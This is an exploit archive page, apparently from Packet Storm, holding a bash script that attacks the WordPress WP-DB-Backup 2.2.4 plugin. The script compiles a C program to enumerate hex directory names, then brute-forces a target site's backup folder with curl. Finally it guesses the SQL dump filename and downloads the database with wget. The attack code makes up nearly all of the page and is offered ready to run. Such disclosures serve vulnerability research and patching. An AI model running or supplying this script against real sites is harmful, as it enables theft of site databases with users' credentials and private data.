Twenty Year Anniversary

WordPress WP-DB-Backup 2.2.4 Backup Theft

WordPress WP-DB-Backup 2.2.4 Backup Theft
Posted Nov 22, 2014
Authored by Larry W. Cashdollar

WordPress WP-DB-Backup plugin version 2.2.4 suffers from a backup stealing vulnerability.

tags | exploit, cracker
MD5 | 695b76e4bd5b98925f45a48a6c41bdd3

WordPress WP-DB-Backup 2.2.4 Backup Theft

Change Mirror Download
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite

DATE="20141031"; #Date to search

if [ ! -e rainbow ]; then

cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
char string[16] = "0123456789abcdef";
int x, y, z, a, b;
for (x = 0; x < 16; x++)
for (y = 0; y < 16; y++)
for (z = 0; z < 16; z++)
for (a = 0; a < 16; a++)
for (b = 0; b < 16; b++)
printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
string[a], string[b]);
return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi

if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching....";
for x in `cat rainbow`; do
CPATH="http://$1/wp-content/backup-$x/";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo $x > found.txt;
break; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=6;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi

# Now that we have the directory lets try to locate the database backup file.

K=999;
for y in `seq -w 0 999`; do
CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Database backup $CPATH Found";
echo "[+] Received $RESULT";
wget $CPATH
exit; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=2;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    10 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close